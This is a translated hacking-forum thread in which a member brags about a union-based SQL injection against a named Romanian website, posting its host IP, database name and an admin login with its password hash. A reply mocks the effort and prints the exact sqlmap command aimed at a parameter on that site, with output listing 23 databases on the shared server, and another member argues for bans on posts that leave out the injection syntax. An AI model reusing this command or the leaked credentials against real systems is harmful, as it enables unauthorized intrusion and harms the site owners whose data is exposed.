.Slacker

[SQLi] www.mida.ro

Posted

[+]Target:

www.mida.ro

[+]Author: .Slacker

[+]Host IP: 46.51.108.12

[+]Version: 5.1.47

[+]Injection-Type: Union Based

[+]Current DB: mida

[+]Tables:



[+]Columns for users:



The site is full of vulnerabilities, so I will take the liberty of making the login credentials public:


+-------------------------------------------------+
| Name: Password: |
| Admin 80f8e70b29c5966a919c38e0ca57c571 |
+-------------------------------------------------+

Posted (edited)
Great!

Will you post the syntax too?

Thanks!

What syntax do you want, bro? Don't you see what it says under his location? That whole thing took two seconds. What kind of sh*t hacking is this? He took a link and ran sqlmap on it.


hp ~ # sqlmap -u "http://www.mida.ro/content.php?id=21" --dbs --union-use

sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:48:13

...............

web server operating system: Linux Fedora
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5

[23:48:14] [INFO] fetching database names
available databases [23]:
[*] ambalaj_ccihr
[*] costides_cartuse
[*] costides_corvina
[*] costides_dekoratex
[*] costides_sazy
[*] costides_transilva
[*] csalad
[*] csikisport
[*] hardwarecenter_hc
[*] hardwarecenter_szamla
[*] information_schema
[*] markbi
[*] mida
[*] munkacsy
[*] mysql
[*] parfum
[*] parfumworld
[*] salvator
[*] syrinx
[*] test
[*] twinart
[*] vkv
[*] zarafa

Done, bro, I ran one command and now I'm a hacker, I'll be in the kingdom of heaven. Let me put it up on Show Off on RST once more, maybe I'll earn the guys' respect, because I'm based :))

Edited by aelius
Guest Kovalski
Posted

Hey, I have something to say. I don't know whether you've had enough of show-offs with sql"i" or not, but personally I'm sick of seeing:

"lumea-copiilor.ro SQLI" WTF?!? When you come with an SQLi (manual) in something that deserves our attention and the time it takes to read that crap of a topic, then it can be called a show-off.

Right now, what gets posted in Show Off is nothing but junk sites with dimwit admins who play Metin 8.

So I propose that whoever posts another show-off with junk sites gets a 1-week ban.

Whoever does an SQLi on a more "decent" site and doesn't post the syntax as well gets a 1-week ban.

The "decent" sites category does not include "moloz.tk, lumea-copiilor.ro, gradinita-sector2.ro suruburi.si.piulite.net" etc., etc.

Whoever agrees with old man ps, holler here.

P.S. In the meantime... trash.
